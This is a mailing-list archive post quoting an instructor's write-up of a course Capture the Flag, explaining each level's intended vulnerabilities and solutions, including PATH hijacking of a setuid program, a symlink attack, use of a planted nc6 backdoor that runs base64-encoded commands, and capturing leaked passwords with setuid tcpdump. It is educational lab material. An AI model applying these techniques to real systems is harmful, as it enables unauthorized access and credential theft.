[cs615asa] CtF ended

Jin Sun jsun6 at stevens.edu
Tue May 6 01:23:51 EDT 2014


Sorry I miss that line.
On May 6, 2014 1:21 AM, "Jin Sun" <jsun6 at stevens.edu> wrote:

> One thing I still want to know is that why leaky can't delete leaky.sh?
> On May 6, 2014 1:03 AM, "Jan Schaumann" <jschauma at stevens.edu> wrote:
>
>> Hello,
>>
>> The first ever CS615 Capture the Flag contest is officially over.  I
>> hope you enjoyed the exercise -- I certainly did have some fun setting
>> it up and seeing how you solved the problems.
>>
>> The following is a summary of the levels, what I hoped you might take
>> away from them, and what possible solutions I had in mind.
>>
>>
>> Level 0:
>>
>> As explained in class, it is useful to be able to send and receive
>> encrypted emails.  The online tutorials are simple enough and easy to
>> follow, and even if fully understanding all aspects of PGP might take
>> some time and practice, I hope you're all off to a good start and will
>> begin using it.
>>
>>
>> Level 1:
>>
>> As also discussed in class, you all were able to identify the checksum
>> as a SHA256 checksum, and finding the right file was then just a matter
>> of iterating through the filesystem.  The starting point for your search
>> would have to have been ~jschauma on linux-lab, as local files on any
>> individual system would not have been available on the others.
>>
>> There were many different ways to do this; here's one:
>>
>> find ~jschauma -type f -exec sha256sum {} \; | grep <known sum>
>>
>>
>> Level 2:
>>
>> The URL you were given didn't show the right password, but looking at
>> the source code, it included a hint to search for the sources of the
>> CGI.  Finding it in ~jschauma/cs_html/cgi-bin/ctf.cgi, you could then
>> inspect the source code, which included a commented out call to display
>> the file '/home/jschauma/cs_html/ctf/level-3'.
>>
>> That file was readable only by the 'www-data' user, that the web server
>> serving the site is running as.  Many of you were able to easily find
>> that you could display that file simply by going to
>> http://www.cs.stevens.edu/~jschauma/ctf/level-3.
>>
>> Another solution (which none of you found) would have been to stage a
>> symlink attack, since ~jschauma/tmp/d (from which the cgi reads), was
>> set mode 777, meaning you could have created a symlink from
>> ~jschauma/tmp/d/nope -> ~jschauma/cs_html/ctf/level-3 and the CGI would
>> have displayed the passphrase.
>>
>>
>> Level 3:
>>
>> Now things were getting a little bit more interesting.  The program you
>> were instructed to run did not display the passphrase you needed.  If
>> you looked around in the directory the program was in, then you might
>> have found a file that you were not able to read, as it was mode 0400
>> and owned by 'jschauma'.
>>
>> The program itself was setuid 'jschauma', and hence running with that
>> user's privileges.  Your task was to trick that program into executing a
>> command that would display the contents of the file in question.
>>
>> By running strace(1) or strings(1) or perhaps even by guessing, you
>> could have realized that the program invokes the id(1) command.  Since
>> the program just ran "id" instead of using an absolute path, all you
>> needed to do was create a script called "id" that did what you needed it
>> to do (for example: "cat /home/jschauma/ctf/whateverXXX"), add the
>> directory of where that script is stored to the beginning of your PATH
>> variable and run the command again.
>>
>> Now one of the teams quickly realized that I had actually made a rather
>> fatal mistake here: since you could trick the command to run anything as
>> the user 'jschauma', you were actually able to run a full interactive
>> shell as me.  Clearly, I had not intended to allow you to do that, and I
>> appreciate that the team that found this reported it to me and then
>> removed the execute permissions from the program to avoid letting
>> somebody else exploit this.
>>
>> I changed the setup to use the 'www-data' account instead and then had
>> to change all my private credentials stored on Stevens systems (which,
>> fortunately, are only few).  This was a good illustration of how tricky
>> it can get when you try to set up a vulnerability to be exploitable in
>> only one specific way.
>>
>> For those of you interested, remember that I have no special privileges
>> on linux-lab, and thus anything I can set up there, you could set up as
>> well.  How then did I manage to create an executable that was setuid
>> 'www-data'?  Think about it, and play around and see if you can
>> replicate the exercise yourself.
>>
>>
>> Level 4:
>>
>> You were given an ssh keypair.  It seems logical that the private key
>> would grant you access to the target system, but why did you receive the
>> public key?  In ssh key authentication, the public key is only needed on
>> the system on which you log in, not on the system from which you
>> connect.
>>
>> The public key did contain a little bit of extra information, namely a
>> "from=" restriction.  As we've hinted at in one of our classes, ssh keys
>> can have a number of options that define what the connecting user can
>> do.  In this case, we can define the networks from which this key may be
>> used.
>>
>> The networks given there were two of Amazon's EC2 networks as well as
>> private network.  That is, the target system allowed ssh logins using
>> the private key from either of those EC2 networks as well as from the
>> internal network.
>>
>> After spinning up an EC2 instance to connect to the target system, you
>> might also have run into a problem where some OS did not understand the
>> ssh key cipher, since some ship with an older version of OpenSSH.
>> Finally, you had to find out which port to connect to, since ssh on the
>> target system wasn't listening on the default port (22), but on another
>> port (2222).  A port mapping tool like nmap would have been able to show
>> this to you.
>>
>> This was just a reminder that network services can be run on any port --
>> nothing says that ssh must always be on port 22, or that HTTP must
>> always be on port 80.  For example, if you had a firewall that only
>> allowed outgoing traffic to port 80, you could just run your ssh server
>> on that port to allow yourself to connect from within the firewalled
>> network.
>>
>> Level 5:
>>
>> This level had a number of steps.  You knew you had to take control of
>> the web server's index page, which you could find under
>> /usr/pkg/share/httpd/htdocs/index.html.  But that file was owned by the
>> 'www' user.  You might have noticed that the time stamp on the file was
>> always recent: something was always updating it.
>>
>> Looking for the 'www' user's crontab in /var/cron/tabs/www, you could
>> have found the following entry:
>>
>> * * * * * /root/reset-site
>>
>> That is, 'www' was running the script /root/reset-site every minute.
>> That script contained a line that, depending on the method used to
>> display it, may have looked a bit odd.  If you used 'cat -v', you might
>> have seen:
>>
>> cp /var/tmp/d/^M/index.html /usr/pkg/share/httpd/htdocs/
>>
>> The user copied the file from a funky looking directory to the website
>> root.  The directory name in question was "^M", which is the control
>> character used for a carriage-return.  (As discussed in an early
>> lecture, filenames can contain all sorts of characters, including
>> control characters.)
>>
>> You can enter the directory by typing Ctrl+V followed by the return key.
>>
>> The interesting thing about this directory (besides its name) is that it
>> had permissions 777.  That is (again, review our earlier lecture) that
>> any user could create or remove files in that directory, regardless of
>> the permissions or ownership on the files themselves.
>>
>> That is, you could have initially taken control of the website by
>> removing the existing index.html file in this directory and instead
>> creating a new file with your contents, and the 'www' crontab would
>> always have copied that into place.
>>
>> That is, it was possible to capture the flag without gaining access to
>> the 'www' account.
>>
>> Now unfortunately using this method it's obvious that any other team
>> could also have done the same thing, so you wouldn't have held on to
>> your victory for very long.  To avoid the flag being stolen, you'd have
>> to change the permissions on /usr/pkg/share/httpd/htdocs/index.html, for
>> which you'd need control of the 'www' account.
>>
>> As many of you found, there was an odd process running: 'nc6 -6 -l -e
>> /bin/64sh'.  Or perhaps you found that there was something listening on
>> port 6150, but only via IPv6.
>>
>> Looking at the manual page for nc6(1) and at the file /bin/64sh, you
>> would have found that there was a backdoor for the 'www' user that
>> requires no authentication, and that would execute any command so long
>> as it was base64 encoded.  That is, you were able to run any command as
>> 'www' by, for example, running
>>
>> echo 'ls -l' | base64 | nc6 localhost 6150
>>
>> This would allow you to take control of the flag, to remove the crontab
>> to reset the site, to change permissions etc.
>>
>> But of course another team could have also found that out, so your
>> defense would have to incude a way to stop this.  Trying to kill the nc6
>> process should have proven futile, since it kept getting re-spawned.
>>
>> However, since the command only re-spawns after it terminates, and since
>> only a single connection to the port is possible, you could effectively
>> block others from using this backdoor by keeping open a network
>> connection.  However, you'd probably want to take care to not DOS
>> yourself and make it impossible for yourself to run any further
>> commands, should you need to.
>>
>> Some of you also found other team members' ssh keys on linux-lab, which
>> were left unprotected.  This allowed them to access the target system as
>> the other team.  Some of the defenses put in place by team Blender
>> included changing the .login script to immediately log out the user
>> again, and an ongoing loop logging in as the other team and running
>> 'pkill -u <other team>'.
>>
>> Both of these defenses were not 100% bulletproof: by manipulating the
>> .login file, interactive logins were made impossible, but the other team
>> could still run any command in a non-interactive ssh session (ie 'ssh
>> team at cs615-ctf.netmeister.org "some command"').  Secondly, the account
>> was only blocked whenever the 'pkill' command ran.  That is, there was a
>> race condition where the attacking team could have been able to log in
>> and run a command before the defending team could kill the command.
>> While complicated, the team could have then moved on to lock out the
>> attacker from at least this account by setting an alias for the kill
>> commands or finding another solution.
>>
>>
>> After the flag was taken, I made public a second backdoor: the 'leaky'
>> user.  The password for the user 'leaky' was stored as a TXT record in
>> the DNS (recall from our earlier class that the DNS can be used for more
>> than just hostname<->IP mappings):
>>
>> host -t TXT cs615-ctf.netmeister.org
>>
>> Once logged in as the 'leaky' user, you would have found the 'leaky'
>> executable, which was a setuid 'root' program that invoked a script that
>> submitted a file containing all users' passwords to a URL.  Since you
>> couldn't take control of the URL, you needed a different way to capture
>> the data.  There were two ways you could have done so:
>>
>> - tcpdump was setuid on cs615-ctf, so any user could have run it; you
>>   could run tcpdump while running the 'leaky' program and then seen the
>>   data in the clear in your tcpdump output
>>
>> - you could set up your own http endpoint and tell the script to send
>>   the data there
>>
>> Having retrieved all the passwords, you'd be able to log in as every
>> user, change the password, disable their accounts and lock the system
>> under your control.
>>
>> Team Blender also removed the 'leaky' program itself to prevent anybody
>> else from repeating the steps, but since we wanted to keep the game a
>> bit interesting, I re-created the program and then set the files to be
>> immutable ('chflags schg file'), so they couldn't be removed.
>>
>> Team Ramrod defended the flag by installing a cronjob for all users that
>> would kill their processes.  This runs every minute, meaning attackers
>> have a one minute window to identify this method and removing the
>> crontab, after which they can change their password and continue
>> attacking from within.  Team Ramrod also neglected to change the
>> password of the 'www' account, leaving that as an attack vector, since
>> the 'leaky' account could not be disabled or its password changed.
>>
>> Here's how I prevented the 'leaky' user from changing its password,
>> while still allowing all other users to do so:
>>
>> # ls -l `which passwd`
>> -r-s---r-x  2 root  leaky  23987 Apr 13 06:48 /usr/bin/passwd
>>
>> That is, the 'leaky' user is in the 'leaky' group (its only member), and
>> I've changed the ownership on the passwd(1) command to that group and
>> removed group read/execute permissions.  Since Unix permissions are
>> granted left-to-right, so to speak ("Is user owner?  No, next: is group
>> group owner? Yes.  Do group permissions allow execution? No."), users in
>> the 'leaky' group cannot execute the command, while other users can.
>>
>> However, one of you discovered a way around this limitation: after
>> logging in as 'leaky', and then switching to another user by way of
>> su(1), running the passwd(1) command will change the password of the
>> 'leaky' user.  This happens because passwd(1) identifies the default
>> username via the getlogin(2) system call, which retrieves the identity
>> as set at session login time and which does not change across
>> invocations of su(1).  (While this is not a bug, I did not consider this
>> behaviour and do find it at least "unexpected".)
>>
>>
>> And so the competition ends, together with the semester.  I will send
>> out and enter grades later this week or early next week.  You should
>> receive a reminder to fill out the course survey, as well.  Please
>> remember that course surveys are anonymous and I cannot see the
>> responses until after I have handed in the grades.  The more feedback
>> you provide, the better I will be able to improve the class for the next
>> year.
>>
>> Thanks, and best of luck in your further academic endeavours,
>>
>> -Jan
>> _______________________________________________
>> cs615asa mailing list
>> cs615asa at lists.stevens.edu
>> https://lists.stevens.edu/mailman/listinfo/cs615asa
>>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.stevens.edu/pipermail/cs615asa/attachments/20140506/106e4aef/attachment-0001.html>


More information about the cs615asa mailing list